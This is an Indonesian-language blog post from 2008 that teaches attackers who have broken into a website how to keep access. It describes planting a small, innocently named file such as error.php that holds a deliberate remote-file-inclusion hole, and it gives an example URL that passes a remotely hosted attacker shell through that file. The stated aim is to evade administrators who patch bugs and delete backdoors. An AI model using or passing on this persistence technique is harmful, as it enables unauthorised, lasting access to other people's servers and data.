Simple php backdoor

Desember 31, 2008 at 5:01 am (I T)

Simple php backdoor

yang master ngga usah baca

nah gini nich…

okeh langsung ajah

kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor

dan patch bugnya.

kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p

trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang

yang kita singkat namanya menjadi (MTPBDTDBO)

xixixxi chain_loader banget :p

nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi

kenapa ngga bikin bug aja sendiri :p

dengan asumsi para MTPBDTDBO tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan

langsung aja pas giliran kita dapet kesempatan upload atau cread file

langsung bikin nama file yang ngga mencurigakan misal

error.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan

kita contohkan dengan error.php

nah kita isi filenya dengan bug RFI

nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil

cara pakainya seperti inject RFI seperti biasa

error.php?error= << inject pake shell kamu

misal:

http://kecemplungkalen.co.cc/error.php?error=http://webtempat.in/inject_kamu.txt???

dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita

pesan buat mafia tukang patch bug dan tukang delet backdoor orang (MTPBDTDBO)

sadarlah kalian wahai tukang delete backdor orang

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: